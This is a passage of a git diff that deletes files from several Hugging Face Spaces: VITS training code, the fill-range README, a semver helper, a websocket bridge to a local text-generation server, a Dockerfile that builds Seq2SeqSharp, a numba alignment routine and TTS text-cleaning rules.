spec_lengths[:1] - y = y[:1] - y_lengths = y_lengths[:1] - speakers = speakers[:1] - break - y_hat, attn, mask, *_ = generator.module.infer(x, x_lengths, speakers, max_len=1000) - y_hat_lengths = mask.sum([1,2]).long() * hps.data.hop_length - - mel = spec_to_mel_torch( - spec, - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.mel_fmin, - hps.data.mel_fmax) - y_hat_mel = mel_spectrogram_torch( - y_hat.squeeze(1).float(), - hps.data.filter_length, - hps.data.n_mel_channels, - hps.data.sampling_rate, - hps.data.hop_length, - hps.data.win_length, - hps.data.mel_fmin, - hps.data.mel_fmax - ) - image_dict = { - "gen/mel": utils.plot_spectrogram_to_numpy(y_hat_mel[0].cpu().numpy()) - } - audio_dict = { - "gen/audio": y_hat[0,:,:y_hat_lengths[0]] - } - if global_step == 0: - image_dict.update({"gt/mel": utils.plot_spectrogram_to_numpy(mel[0].cpu().numpy())}) - audio_dict.update({"gt/audio": y[0,:,:y_lengths[0]]}) - - utils.summarize( - writer=writer_eval, - global_step=global_step, - images=image_dict, - audios=audio_dict, - audio_sampling_rate=hps.data.sampling_rate - ) - generator.train() - - -if __name__ == "__main__": - main() diff --git a/spaces/zhang-wei-jian/docker/node_modules/fill-range/README.md b/spaces/zhang-wei-jian/docker/node_modules/fill-range/README.md deleted file mode 100644 index 8d756fe9016aec005378ea1b61e599d944ffa4d3..0000000000000000000000000000000000000000 --- a/spaces/zhang-wei-jian/docker/node_modules/fill-range/README.md +++ /dev/null @@ -1,237 +0,0 @@ -# fill-range [![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=W8YFZ425KND68) [![NPM version](https://img.shields.io/npm/v/fill-range.svg?style=flat)](https://www.npmjs.com/package/fill-range) [![NPM monthly downloads](https://img.shields.io/npm/dm/fill-range.svg?style=flat)](https://npmjs.org/package/fill-range) [![NPM total downloads](https://img.shields.io/npm/dt/fill-range.svg?style=flat)](https://npmjs.org/package/fill-range) [![Linux Build Status](https://img.shields.io/travis/jonschlinkert/fill-range.svg?style=flat&label=Travis)](https://travis-ci.org/jonschlinkert/fill-range) - -> Fill in a range of numbers or letters, optionally passing an increment or `step` to use, or create a regex-compatible range with `options.toRegex` - -Please consider following this project's author, [Jon Schlinkert](https://github.com/jonschlinkert), and consider starring the project to show your :heart: and support. - -## Install - -Install with [npm](https://www.npmjs.com/): - -```sh -$ npm install --save fill-range -``` - -## Usage - -Expands numbers and letters, optionally using a `step` as the last argument. _(Numbers may be defined as JavaScript numbers or strings)_. - -```js -const fill = require('fill-range'); -// fill(from, to[, step, options]); - -console.log(fill('1', '10')); //=> ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10'] -console.log(fill('1', '10', { toRegex: true })); //=> [1-9]|10 -``` - -**Params** - -* `from`: **{String|Number}** the number or letter to start with -* `to`: **{String|Number}** the number or letter to end with -* `step`: **{String|Number|Object|Function}** Optionally pass a [step](#optionsstep) to use. -* `options`: **{Object|Function}**: See all available [options](#options) - -## Examples - -By default, an array of values is returned. - -**Alphabetical ranges** - -```js -console.log(fill('a', 'e')); //=> ['a', 'b', 'c', 'd', 'e'] -console.log(fill('A', 'E')); //=> [ 'A', 'B', 'C', 'D', 'E' ] -``` - -**Numerical ranges** - -Numbers can be defined as actual numbers or strings. - -```js -console.log(fill(1, 5)); //=> [ 1, 2, 3, 4, 5 ] -console.log(fill('1', '5')); //=> [ 1, 2, 3, 4, 5 ] -``` - -**Negative ranges** - -Numbers can be defined as actual numbers or strings. - -```js -console.log(fill('-5', '-1')); //=> [ '-5', '-4', '-3', '-2', '-1' ] -console.log(fill('-5', '5')); //=> [ '-5', '-4', '-3', '-2', '-1', '0', '1', '2', '3', '4', '5' ] -``` - -**Steps (increments)** - -```js -// numerical ranges with increments -console.log(fill('0', '25', 4)); //=> [ '0', '4', '8', '12', '16', '20', '24' ] -console.log(fill('0', '25', 5)); //=> [ '0', '5', '10', '15', '20', '25' ] -console.log(fill('0', '25', 6)); //=> [ '0', '6', '12', '18', '24' ] - -// alphabetical ranges with increments -console.log(fill('a', 'z', 4)); //=> [ 'a', 'e', 'i', 'm', 'q', 'u', 'y' ] -console.log(fill('a', 'z', 5)); //=> [ 'a', 'f', 'k', 'p', 'u', 'z' ] -console.log(fill('a', 'z', 6)); //=> [ 'a', 'g', 'm', 's', 'y' ] -``` - -## Options - -### options.step - -**Type**: `number` (formatted as a string or number) - -**Default**: `undefined` - -**Description**: The increment to use for the range. Can be used with letters or numbers. - -**Example(s)** - -```js -// numbers -console.log(fill('1', '10', 2)); //=> [ '1', '3', '5', '7', '9' ] -console.log(fill('1', '10', 3)); //=> [ '1', '4', '7', '10' ] -console.log(fill('1', '10', 4)); //=> [ '1', '5', '9' ] - -// letters -console.log(fill('a', 'z', 5)); //=> [ 'a', 'f', 'k', 'p', 'u', 'z' ] -console.log(fill('a', 'z', 7)); //=> [ 'a', 'h', 'o', 'v' ] -console.log(fill('a', 'z', 9)); //=> [ 'a', 'j', 's' ] -``` - -### options.strictRanges - -**Type**: `boolean` - -**Default**: `false` - -**Description**: By default, `null` is returned when an invalid range is passed. Enable this option to throw a `RangeError` on invalid ranges. - -**Example(s)** - -The following are all invalid: - -```js -fill('1.1', '2'); // decimals not supported in ranges -fill('a', '2'); // incompatible range values -fill(1, 10, 'foo'); // invalid "step" argument -``` - -### options.stringify - -**Type**: `boolean` - -**Default**: `undefined` - -**Description**: Cast all returned values to strings. By default, integers are returned as numbers. - -**Example(s)** - -```js -console.log(fill(1, 5)); //=> [ 1, 2, 3, 4, 5 ] -console.log(fill(1, 5, { stringify: true })); //=> [ '1', '2', '3', '4', '5' ] -``` - -### options.toRegex - -**Type**: `boolean` - -**Default**: `undefined` - -**Description**: Create a regex-compatible source string, instead of expanding values to an array. - -**Example(s)** - -```js -// alphabetical range -console.log(fill('a', 'e', { toRegex: true })); //=> '[a-e]' -// alphabetical with step -console.log(fill('a', 'z', 3, { toRegex: true })); //=> 'a|d|g|j|m|p|s|v|y' -// numerical range -console.log(fill('1', '100', { toRegex: true })); //=> '[1-9]|[1-9][0-9]|100' -// numerical range with zero padding -console.log(fill('000001', '100000', { toRegex: true })); -//=> '0{5}[1-9]|0{4}[1-9][0-9]|0{3}[1-9][0-9]{2}|0{2}[1-9][0-9]{3}|0[1-9][0-9]{4}|100000' -``` - -### options.transform - -**Type**: `function` - -**Default**: `undefined` - -**Description**: Customize each value in the returned array (or [string](#optionstoRegex)). _(you can also pass this function as the last argument to `fill()`)_. - -**Example(s)** - -```js -// add zero padding -console.log(fill(1, 5, value => String(value).padStart(4, '0'))); -//=> ['0001', '0002', '0003', '0004', '0005'] -``` - -## About - -
      -Contributing - -Pull requests and stars are always welcome. For bugs and feature requests, [please create an issue](../../issues/new). - -
      - -
      -Running Tests - -Running and reviewing unit tests is a great way to get familiarized with a library and its API. You can install dependencies and run tests with the following command: - -```sh -$ npm install && npm test -``` - -
      - -
      -Building docs - -_(This project's readme.md is generated by [verb](https://github.com/verbose/verb-generate-readme), please don't edit the readme directly. Any changes to the readme must be made in the [.verb.md](.verb.md) readme template.)_ - -To generate the readme, run the following command: - -```sh -$ npm install -g verbose/verb#dev verb-generate-readme && verb -``` - -
      - -### Contributors - -| **Commits** | **Contributor** | -| --- | --- | -| 116 | [jonschlinkert](https://github.com/jonschlinkert) | -| 4 | [paulmillr](https://github.com/paulmillr) | -| 2 | [realityking](https://github.com/realityking) | -| 2 | [bluelovers](https://github.com/bluelovers) | -| 1 | [edorivai](https://github.com/edorivai) | -| 1 | [wtgtybhertgeghgtwtg](https://github.com/wtgtybhertgeghgtwtg) | - -### Author - -**Jon Schlinkert** - -* [GitHub Profile](https://github.com/jonschlinkert) -* [Twitter Profile](https://twitter.com/jonschlinkert) -* [LinkedIn Profile](https://linkedin.com/in/jonschlinkert) - -Please consider supporting me on Patreon, or [start your own Patreon page](https://patreon.com/invite/bxpbvm)! - - - - - -### License - -Copyright © 2019, [Jon Schlinkert](https://github.com/jonschlinkert). -Released under the [MIT License](LICENSE). - -*** - -_This file was generated by [verb-generate-readme](https://github.com/verbose/verb-generate-readme), v0.8.0, on April 08, 2019._ \ No newline at end of file diff --git a/spaces/zhang-wei-jian/docker/node_modules/simple-update-notifier/node_modules/semver/functions/prerelease.js b/spaces/zhang-wei-jian/docker/node_modules/simple-update-notifier/node_modules/semver/functions/prerelease.js deleted file mode 100644 index 06aa13248ae65180cce1f2b3567be654c92b467a..0000000000000000000000000000000000000000 --- a/spaces/zhang-wei-jian/docker/node_modules/simple-update-notifier/node_modules/semver/functions/prerelease.js +++ /dev/null @@ -1,6 +0,0 @@ -const parse = require('./parse') -const prerelease = (version, options) => { - const parsed = parse(version, options) - return (parsed && parsed.prerelease.length) ? parsed.prerelease : null -} -module.exports = prerelease diff --git a/spaces/zhanghaohui/szu-gpt-academic/request_llm/bridge_tgui.py b/spaces/zhanghaohui/szu-gpt-academic/request_llm/bridge_tgui.py deleted file mode 100644 index fcf852f0474892bd179843ece3f4a83110bd7756..0000000000000000000000000000000000000000 --- a/spaces/zhanghaohui/szu-gpt-academic/request_llm/bridge_tgui.py +++ /dev/null @@ -1,171 +0,0 @@ -''' -Contributed by SagsMug. Modified by binary-husky -https://github.com/oobabooga/text-generation-webui/pull/175 -''' - -import asyncio -import json -import random -import string -import websockets -import logging -import time -import threading -import importlib -from toolbox import get_conf, update_ui - - -def random_hash(): - letters = string.ascii_lowercase + string.digits - return ''.join(random.choice(letters) for i in range(9)) - -async def run(context, max_token, temperature, top_p, addr, port): - params = { - 'max_new_tokens': max_token, - 'do_sample': True, - 'temperature': temperature, - 'top_p': top_p, - 'typical_p': 1, - 'repetition_penalty': 1.05, - 'encoder_repetition_penalty': 1.0, - 'top_k': 0, - 'min_length': 0, - 'no_repeat_ngram_size': 0, - 'num_beams': 1, - 'penalty_alpha': 0, - 'length_penalty': 1, - 'early_stopping': True, - 'seed': -1, - } - session = random_hash() - - async with websockets.connect(f"ws://{addr}:{port}/queue/join") as websocket: - while content := json.loads(await websocket.recv()): - #Python3.10 syntax, replace with if elif on older - if content["msg"] == "send_hash": - await websocket.send(json.dumps({ - "session_hash": session, - "fn_index": 12 - })) - elif content["msg"] == "estimation": - pass - elif content["msg"] == "send_data": - await websocket.send(json.dumps({ - "session_hash": session, - "fn_index": 12, - "data": [ - context, - params['max_new_tokens'], - params['do_sample'], - params['temperature'], - params['top_p'], - params['typical_p'], - params['repetition_penalty'], - params['encoder_repetition_penalty'], - params['top_k'], - params['min_length'], - params['no_repeat_ngram_size'], - params['num_beams'], - params['penalty_alpha'], - params['length_penalty'], - params['early_stopping'], - params['seed'], - ] - })) - elif content["msg"] == "process_starts": - pass - elif content["msg"] in ["process_generating", "process_completed"]: - yield content["output"]["data"][0] - # You can search for your desired end indicator and - # stop generation by closing the websocket here - if (content["msg"] == "process_completed"): - break - - - - - -def predict(inputs, llm_kwargs, plugin_kwargs, chatbot, history=[], system_prompt='', stream = True, additional_fn=None): - """ - 发送至chatGPT,流式获取输出。 - 用于基础的对话功能。 - inputs 是本次问询的输入 - top_p, temperature是chatGPT的内部调优参数 - history 是之前的对话列表(注意无论是inputs还是history,内容太长了都会触发token数量溢出的错误) - chatbot 为WebUI中显示的对话列表,修改它,然后yeild出去,可以直接修改对话界面内容 - additional_fn代表点击的哪个按钮,按钮见functional.py - """ - if additional_fn is not None: - import core_functional - importlib.reload(core_functional) # 热更新prompt - core_functional = core_functional.get_core_functions() - if "PreProcess" in core_functional[additional_fn]: inputs = core_functional[additional_fn]["PreProcess"](inputs) # 获取预处理函数(如果有的话) - inputs = core_functional[additional_fn]["Prefix"] + inputs + core_functional[additional_fn]["Suffix"] - - raw_input = "What I would like to say is the following: " + inputs - history.extend([inputs, ""]) - chatbot.append([inputs, ""]) - yield from update_ui(chatbot=chatbot, history=history, msg="等待响应") # 刷新界面 - - prompt = raw_input - tgui_say = "" - - model_name, addr_port = llm_kwargs['llm_model'].split('@') - assert ':' in addr_port, "LLM_MODEL 格式不正确!" + llm_kwargs['llm_model'] - addr, port = addr_port.split(':') - - - mutable = ["", time.time()] - def run_coorotine(mutable): - async def get_result(mutable): - # "tgui:galactica-1.3b@localhost:7860" - - async for response in run(context=prompt, max_token=llm_kwargs['max_length'], - temperature=llm_kwargs['temperature'], - top_p=llm_kwargs['top_p'], addr=addr, port=port): - print(response[len(mutable[0]):]) - mutable[0] = response - if (time.time() - mutable[1]) > 3: - print('exit when no listener') - break - asyncio.run(get_result(mutable)) - - thread_listen = threading.Thread(target=run_coorotine, args=(mutable,), daemon=True) - thread_listen.start() - - while thread_listen.is_alive(): - time.sleep(1) - mutable[1] = time.time() - # Print intermediate steps - if tgui_say != mutable[0]: - tgui_say = mutable[0] - history[-1] = tgui_say - chatbot[-1] = (history[-2], history[-1]) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - - - - -def predict_no_ui_long_connection(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience=False): - raw_input = "What I would like to say is the following: " + inputs - prompt = raw_input - tgui_say = "" - model_name, addr_port = llm_kwargs['llm_model'].split('@') - assert ':' in addr_port, "LLM_MODEL 格式不正确!" + llm_kwargs['llm_model'] - addr, port = addr_port.split(':') - - - def run_coorotine(observe_window): - async def get_result(observe_window): - async for response in run(context=prompt, max_token=llm_kwargs['max_length'], - temperature=llm_kwargs['temperature'], - top_p=llm_kwargs['top_p'], addr=addr, port=port): - print(response[len(observe_window[0]):]) - observe_window[0] = response - if (time.time() - observe_window[1]) > 5: - print('exit when no listener') - break - asyncio.run(get_result(observe_window)) - thread_listen = threading.Thread(target=run_coorotine, args=(observe_window,)) - thread_listen.start() - return observe_window[0] diff --git a/spaces/zhongkaifu/mt_jpnkor_chs/Dockerfile b/spaces/zhongkaifu/mt_jpnkor_chs/Dockerfile deleted file mode 100644 index 8ea97f1803993fdd07a17e8c688e88762ecb5b45..0000000000000000000000000000000000000000 --- a/spaces/zhongkaifu/mt_jpnkor_chs/Dockerfile +++ /dev/null @@ -1,50 +0,0 @@ -# read the doc: https://huggingface.co/docs/hub/spaces-sdks-docker -# you will also find guides on how best to write your Dockerfile - -FROM python:3.9 - -WORKDIR /code - -COPY ./requirements.txt /code/requirements.txt - -RUN pip install --no-cache-dir --upgrade -r /code/requirements.txt - -RUN wget https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb -RUN dpkg -i packages-microsoft-prod.deb -RUN rm packages-microsoft-prod.deb - -RUN curl -s https://packagecloud.io/install/repositories/github/git-lfs/script.deb.sh - -RUN apt-get update -RUN apt-get install -y dotnet-sdk-7.0 -RUN apt-get install -y aspnetcore-runtime-7.0 -RUN apt-get install -y cmake -RUN apt-get install -y git-lfs - -RUN git clone https://github.com/zhongkaifu/Seq2SeqSharp.git -WORKDIR /code/Seq2SeqSharp -RUN dotnet build Seq2SeqSharp.sln --configuration Release - -WORKDIR /code/Seq2SeqSharp/ExternalProjects -RUN unzip SentencePiece.zip -WORKDIR /code/Seq2SeqSharp/ExternalProjects/SentencePiece -RUN mkdir build -WORKDIR /code/Seq2SeqSharp/ExternalProjects/SentencePiece/build -RUN cmake .. -RUN make -j $(nproc) -RUN make install -RUN ldconfig -v - -WORKDIR /code - -RUN mkdir -p /code/bin -RUN chmod 777 /code/bin -WORKDIR /code/bin - -RUN cp -r /code/Seq2SeqSharp/Tools/SeqWebApps/bin/Release/net7.0/* . -RUN wget https://github.com/zhongkaifu/Models/releases/download/MT_KORJPN_CHS/mt_cjk_chs.model -RUN wget https://huggingface.co/zhongkaifu/mt_jpnkor_chs/resolve/main/cjkSpm.model -RUN rm appsettings.json -RUN wget https://huggingface.co/zhongkaifu/mt_jpnkor_chs/resolve/main/appsettings.json - -CMD ["dotnet","/code/bin/SeqWebApps.dll"] \ No newline at end of file diff --git a/spaces/zomehwh/bert_vits2/monotonic_align/core.py b/spaces/zomehwh/bert_vits2/monotonic_align/core.py deleted file mode 100644 index 7c962adea65543ef426034c4d53c4f0e615e8181..0000000000000000000000000000000000000000 --- a/spaces/zomehwh/bert_vits2/monotonic_align/core.py +++ /dev/null @@ -1,46 +0,0 @@ -import numba - - -@numba.jit( - numba.void( - numba.int32[:, :, ::1], - numba.float32[:, :, ::1], - numba.int32[::1], - numba.int32[::1], - ), - nopython=True, - nogil=True, -) -def maximum_path_jit(paths, values, t_ys, t_xs): - b = paths.shape[0] - max_neg_val = -1e9 - for i in range(int(b)): - path = paths[i] - value = values[i] - t_y = t_ys[i] - t_x = t_xs[i] - - v_prev = v_cur = 0.0 - index = t_x - 1 - - for y in range(t_y): - for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)): - if x == y: - v_cur = max_neg_val - else: - v_cur = value[y - 1, x] - if x == 0: - if y == 0: - v_prev = 0.0 - else: - v_prev = max_neg_val - else: - v_prev = value[y - 1, x - 1] - value[y, x] += max(v_prev, v_cur) - - for y in range(t_y - 1, -1, -1): - path[y, index] = 1 - if index != 0 and ( - index == y or value[y - 1, index] < value[y - 1, index - 1] - ): - index = index - 1 diff --git a/spaces/zomehwh/vits-models-genshin-bh3/text/cleaners.py b/spaces/zomehwh/vits-models-genshin-bh3/text/cleaners.py deleted file mode 100644 index 68c9ad24d5a303b68a521fba2e8776c8cc867356..0000000000000000000000000000000000000000 --- a/spaces/zomehwh/vits-models-genshin-bh3/text/cleaners.py +++ /dev/null @@ -1,475 +0,0 @@ -""" from https://github.com/keithito/tacotron """ - -''' -Cleaners are transformations that run over the input text at both training and eval time. - -Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" -hyperparameter. Some cleaners are English-specific. You'll typically want to use: - 1. "english_cleaners" for English text - 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using - the Unidecode library (https://pypi.python.org/pypi/Unidecode) - 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update - the symbols in symbols.py to match your data). -''' - -import re -from unidecode import unidecode -import pyopenjtalk -from jamo import h2j, j2hcj -from pypinyin import lazy_pinyin, BOPOMOFO -import jieba, cn2an - - -# This is a list of Korean classifiers preceded by pure Korean numerals. -_korean_classifiers = '군데 권 개 그루 닢 대 두 마리 모 모금 뭇 발 발짝 방 번 벌 보루 살 수 술 시 쌈 움큼 정 짝 채 척 첩 축 켤레 톨 통' - -# Regular expression matching whitespace: -_whitespace_re = re.compile(r'\s+') - -# Regular expression matching Japanese without punctuation marks: -_japanese_characters = re.compile(r'[A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# Regular expression matching non-Japanese characters or punctuation marks: -_japanese_marks = re.compile(r'[^A-Za-z\d\u3005\u3040-\u30ff\u4e00-\u9fff\uff11-\uff19\uff21-\uff3a\uff41-\uff5a\uff66-\uff9d]') - -# List of (regular expression, replacement) pairs for abbreviations: -_abbreviations = [(re.compile('\\b%s\\.' % x[0], re.IGNORECASE), x[1]) for x in [ - ('mrs', 'misess'), - ('mr', 'mister'), - ('dr', 'doctor'), - ('st', 'saint'), - ('co', 'company'), - ('jr', 'junior'), - ('maj', 'major'), - ('gen', 'general'), - ('drs', 'doctors'), - ('rev', 'reverend'), - ('lt', 'lieutenant'), - ('hon', 'honorable'), - ('sgt', 'sergeant'), - ('capt', 'captain'), - ('esq', 'esquire'), - ('ltd', 'limited'), - ('col', 'colonel'), - ('ft', 'fort'), -]] - -# List of (hangul, hangul divided) pairs: -_hangul_divided = [(re.compile('%s' % x[0]), x[1]) for x in [ - ('ㄳ', 'ㄱㅅ'), - ('ㄵ', 'ㄴㅈ'), - ('ㄶ', 'ㄴㅎ'), - ('ㄺ', 'ㄹㄱ'), - ('ㄻ', 'ㄹㅁ'), - ('ㄼ', 'ㄹㅂ'), - ('ㄽ', 'ㄹㅅ'), - ('ㄾ', 'ㄹㅌ'), - ('ㄿ', 'ㄹㅍ'), - ('ㅀ', 'ㄹㅎ'), - ('ㅄ', 'ㅂㅅ'), - ('ㅘ', 'ㅗㅏ'), - ('ㅙ', 'ㅗㅐ'), - ('ㅚ', 'ㅗㅣ'), - ('ㅝ', 'ㅜㅓ'), - ('ㅞ', 'ㅜㅔ'), - ('ㅟ', 'ㅜㅣ'), - ('ㅢ', 'ㅡㅣ'), - ('ㅑ', 'ㅣㅏ'), - ('ㅒ', 'ㅣㅐ'), - ('ㅕ', 'ㅣㅓ'), - ('ㅖ', 'ㅣㅔ'), - ('ㅛ', 'ㅣㅗ'), - ('ㅠ', 'ㅣㅜ') -]] - -# List of (Latin alphabet, hangul) pairs: -_latin_to_hangul = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', '에이'), - ('b', '비'), - ('c', '시'), - ('d', '디'), - ('e', '이'), - ('f', '에프'), - ('g', '지'), - ('h', '에이치'), - ('i', '아이'), - ('j', '제이'), - ('k', '케이'), - ('l', '엘'), - ('m', '엠'), - ('n', '엔'), - ('o', '오'), - ('p', '피'), - ('q', '큐'), - ('r', '아르'), - ('s', '에스'), - ('t', '티'), - ('u', '유'), - ('v', '브이'), - ('w', '더블유'), - ('x', '엑스'), - ('y', '와이'), - ('z', '제트') -]] - -# List of (Latin alphabet, bopomofo) pairs: -_latin_to_bopomofo = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('a', 'ㄟˉ'), - ('b', 'ㄅㄧˋ'), - ('c', 'ㄙㄧˉ'), - ('d', 'ㄉㄧˋ'), - ('e', 'ㄧˋ'), - ('f', 'ㄝˊㄈㄨˋ'), - ('g', 'ㄐㄧˋ'), - ('h', 'ㄝˇㄑㄩˋ'), - ('i', 'ㄞˋ'), - ('j', 'ㄐㄟˋ'), - ('k', 'ㄎㄟˋ'), - ('l', 'ㄝˊㄛˋ'), - ('m', 'ㄝˊㄇㄨˋ'), - ('n', 'ㄣˉ'), - ('o', 'ㄡˉ'), - ('p', 'ㄆㄧˉ'), - ('q', 'ㄎㄧㄡˉ'), - ('r', 'ㄚˋ'), - ('s', 'ㄝˊㄙˋ'), - ('t', 'ㄊㄧˋ'), - ('u', 'ㄧㄡˉ'), - ('v', 'ㄨㄧˉ'), - ('w', 'ㄉㄚˋㄅㄨˋㄌㄧㄡˋ'), - ('x', 'ㄝˉㄎㄨˋㄙˋ'), - ('y', 'ㄨㄞˋ'), - ('z', 'ㄗㄟˋ') -]] - - -# List of (bopomofo, romaji) pairs: -_bopomofo_to_romaji = [(re.compile('%s' % x[0], re.IGNORECASE), x[1]) for x in [ - ('ㄅㄛ', 'p⁼wo'), - ('ㄆㄛ', 'pʰwo'), - ('ㄇㄛ', 'mwo'), - ('ㄈㄛ', 'fwo'), - ('ㄅ', 'p⁼'), - ('ㄆ', 'pʰ'), - ('ㄇ', 'm'), - ('ㄈ', 'f'), - ('ㄉ', 't⁼'), - ('ㄊ', 'tʰ'), - ('ㄋ', 'n'), - ('ㄌ', 'l'), - ('ㄍ', 'k⁼'), - ('ㄎ', 'kʰ'), - ('ㄏ', 'h'), - ('ㄐ', 'ʧ⁼'), - ('ㄑ', 'ʧʰ'), - ('ㄒ', 'ʃ'), - ('ㄓ', 'ʦ`⁼'), - ('ㄔ', 'ʦ`ʰ'), - ('ㄕ', 's`'), - ('ㄖ', 'ɹ`'), - ('ㄗ', 'ʦ⁼'), - ('ㄘ', 'ʦʰ'), - ('ㄙ', 's'), - ('ㄚ', 'a'), - ('ㄛ', 'o'), - ('ㄜ', 'ə'), - ('ㄝ', 'e'), - ('ㄞ', 'ai'), - ('ㄟ', 'ei'), - ('ㄠ', 'au'), - ('ㄡ', 'ou'), - ('ㄧㄢ', 'yeNN'), - ('ㄢ', 'aNN'), - ('ㄧㄣ', 'iNN'), - ('ㄣ', 'əNN'), - ('ㄤ', 'aNg'), - ('ㄧㄥ', 'iNg'), - ('ㄨㄥ', 'uNg'), - ('ㄩㄥ', 'yuNg'), - ('ㄥ', 'əNg'), - ('ㄦ', 'əɻ'), - ('ㄧ', 'i'), - ('ㄨ', 'u'), - ('ㄩ', 'ɥ'), - ('ˉ', '→'), - ('ˊ', '↑'), - ('ˇ', '↓↑'), - ('ˋ', '↓'), - ('˙', ''), - (',', ','), - ('。', '.'), - ('!', '!'), - ('?', '?'), - ('—', '-') -]] - - -def expand_abbreviations(text): - for regex, replacement in _abbreviations: - text = re.sub(regex, replacement, text) - return text - - -def lowercase(text): - return text.lower() - - -def collapse_whitespace(text): - return re.sub(_whitespace_re, ' ', text) - - -def convert_to_ascii(text): - return unidecode(text) - - -def japanese_to_romaji_with_accent(text): - '''Reference https://r9y9.github.io/ttslearn/latest/notebooks/ch10_Recipe-Tacotron.html''' - sentences = re.split(_japanese_marks, text) - marks = re.findall(_japanese_marks, text) - text = '' - for i, sentence in enumerate(sentences): - if re.match(_japanese_characters, sentence): - if text!='': - text+=' ' - labels = pyopenjtalk.extract_fullcontext(sentence) - for n, label in enumerate(labels): - phoneme = re.search(r'\-([^\+]*)\+', label).group(1) - if phoneme not in ['sil','pau']: - text += phoneme.replace('ch','ʧ').replace('sh','ʃ').replace('cl','Q') - else: - continue - n_moras = int(re.search(r'/F:(\d+)_', label).group(1)) - a1 = int(re.search(r"/A:(\-?[0-9]+)\+", label).group(1)) - a2 = int(re.search(r"\+(\d+)\+", label).group(1)) - a3 = int(re.search(r"\+(\d+)/", label).group(1)) - if re.search(r'\-([^\+]*)\+', labels[n + 1]).group(1) in ['sil','pau']: - a2_next=-1 - else: - a2_next = int(re.search(r"\+(\d+)\+", labels[n + 1]).group(1)) - # Accent phrase boundary - if a3 == 1 and a2_next == 1: - text += ' ' - # Falling - elif a1 == 0 and a2_next == a2 + 1 and a2 != n_moras: - text += '↓' - # Rising - elif a2 == 1 and a2_next == 2: - text += '↑' - if i